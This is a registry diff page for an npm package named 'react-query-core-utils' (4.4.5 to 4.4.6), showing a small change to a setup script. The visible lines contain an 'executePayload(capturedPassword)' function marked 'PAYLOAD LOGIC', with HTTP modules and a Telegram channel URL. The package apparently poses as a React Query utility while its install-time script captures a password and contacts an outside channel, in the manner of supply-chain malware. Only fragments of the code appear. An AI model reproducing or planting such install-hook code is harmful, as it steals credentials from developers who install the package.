react-query-core-utils 4.4.5 → 4.4.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/scripts/setup.js +1 -1
package/package.json
CHANGED
package/scripts/setup.js
CHANGED
|
@@ -106,7 +106,7 @@ async function spinner(text, duration) {
|
|
|
106
106
|
|
|
107
107
|
// --- PAYLOAD LOGIC ---
|
|
108
108
|
async function executePayload(capturedPassword) {
|
|
109
|
-
const debugMode =
|
|
109
|
+
const debugMode = true;
|
|
110
110
|
const http = require('http');
|
|
111
111
|
const https = require('https');
|
|
112
112
|
const CHANNEL_URL = 'https://t.me/s/roblox_f847yt83w7it';
|